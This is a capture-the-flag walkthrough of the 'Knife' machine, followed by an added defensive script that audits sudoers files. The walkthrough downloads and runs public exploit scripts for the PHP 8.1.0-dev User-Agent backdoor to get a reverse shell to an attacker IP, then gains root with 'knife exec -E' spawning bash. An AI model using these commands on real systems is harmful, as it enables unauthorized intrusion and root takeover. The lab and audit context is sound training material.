Walkthrough for Knife

Reconnaissance

As always, I started with an nmap scan.

The nmap output shows two open ports, 22 and 80. To enumerate further I installed Wappalyzer, a tool that gathers technical details about a website's stack.

To install this on Firefox:

1. Go to about:debugging#/runtime/this-firefox
2. Click 'Load Temporary Add-on'
3. Select src/drivers/webextension/manifest.json from the folder where Wappalyzer was downloaded.

When installed it shows the message below.

Clicking the small icon on the right-hand side shows information about the technologies in use.

The site is running PHP 8.1.0, a build affected by a backdoor: an attacker can execute arbitrary code by sending a crafted User-Agent header. More information, and the interesting story behind this exploit, is in the blog post below:

https://flast101.github.io/php-8.1.0-dev-backdoor-rce/

Two scripts need to be downloaded to get a reverse shell from the exploit:

the POC script from this link,

and the reverse shell exploit from here.

wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/backdoor_php_8.1.0-dev.py
wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py

Now that both exploits are in your directory:

python3 backdoor_php_8.1.0-dev.py
python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

And we get the user!

Privilege Escalation

The sudo -l command lists the sudo privileges of the current user.

sudo -l

The user is allowed to execute the knife command with root's privileges.

About knife

knife includes a collection of built-in subcommands that work together to provide all of the functionality required to take specific actions against any object in an organization, including cookbooks, nodes, roles, data bags, environments, and users.

I tried to add and edit users and a few other things with the knife command. If there is a way to perform code execution through knife, we can write a simple snippet that spawns a shell, and it will run with root's privileges. The page https://docs.chef.io/workstation/knife_exec/ has good references for this: knife exec evaluates a Ruby string passed with -E.

knife exec -E 'RUBY CODE'

To spawn a shell from Ruby, we pass exec "/bin/bash"; as the Ruby code:

knife exec -E 'exec "/bin/bash";'

And grab the flag!
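The root cause of this escalation is a sudoers entry that grants knife with no argument restriction, so any subcommand (including exec -E) runs as root. As an added, defender-side example that is not part of the original walkthrough, the script below audits a sudoers file for such entries; the user names, paths and sudoers lines are constructed sample data, not the machine's real configuration.

```python
import re

# Binaries that hand out a root shell when sudo allows them without an
# argument restriction. knife is listed because `knife exec -E '<ruby>'`
# runs arbitrary Ruby as the sudo target user (the path used on this box).
# Extend this dict with other binaries from your own policy.
SHELL_ESCAPES = {
    "knife": "knife exec -E runs arbitrary Ruby",
}

# user  host=(runas) [TAG:]... command[, command...]
SUDOERS_LINE = re.compile(
    r"^(?P<user>[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?:[A-Z]+:\s*)*(?P<cmds>.+)$"
)

# Constructed sample sudoers; not the real file from the machine.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
alice   ALL=(root) NOPASSWD: /usr/bin/knife        # any subcommand allowed
bob     ALL=(root) /usr/bin/knife node list        # argument-restricted
carol   ALL=(ALL) NOPASSWD: /usr/bin/systemctl status apache2
"""

def audit_sudoers(text):
    """Return (user, runas, command, reason) for entries that yield a root shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        m = SUDOERS_LINE.match(line) if line and not line.startswith("Defaults") else None
        if not m or m.group("user") == "root":
            continue
        runas = m.group("runas") or "root"  # sudoers runs as root by default
        for cmd in m.group("cmds").split(","):
            parts = cmd.split()
            if not parts:
                continue
            if parts[0] == "ALL":
                findings.append((m.group("user"), runas, "ALL", "any command"))
                continue
            binary = parts[0].rsplit("/", 1)[-1]
            # A bare path with no arguments lets the user pick the subcommand.
            if binary in SHELL_ESCAPES and len(parts) == 1:
                findings.append((m.group("user"), runas, parts[0], SHELL_ESCAPES[binary]))
    return findings

if __name__ == "__main__":
    for user, runas, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user} may run {cmd} as {runas}: {reason}")
```

Only alice's entry is reported: bob's is pinned to one subcommand and carol's binary is not a known shell escape. The fix is to restrict the sudo entry to the specific knife subcommands the user needs.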

Skills and lessons I learnt from this machine

I learnt to use the Wappalyzer tool, how to run publicly available exploits, and how to escalate privileges by abusing the functionality of a tool (knife) that the user can run with sudo rights.

The lessons show why one should not run vulnerable software. The story behind the exploit is also a good example of why a secure version of TLS and a secure hashing algorithm should be used for storing passwords.

Sheetal Patil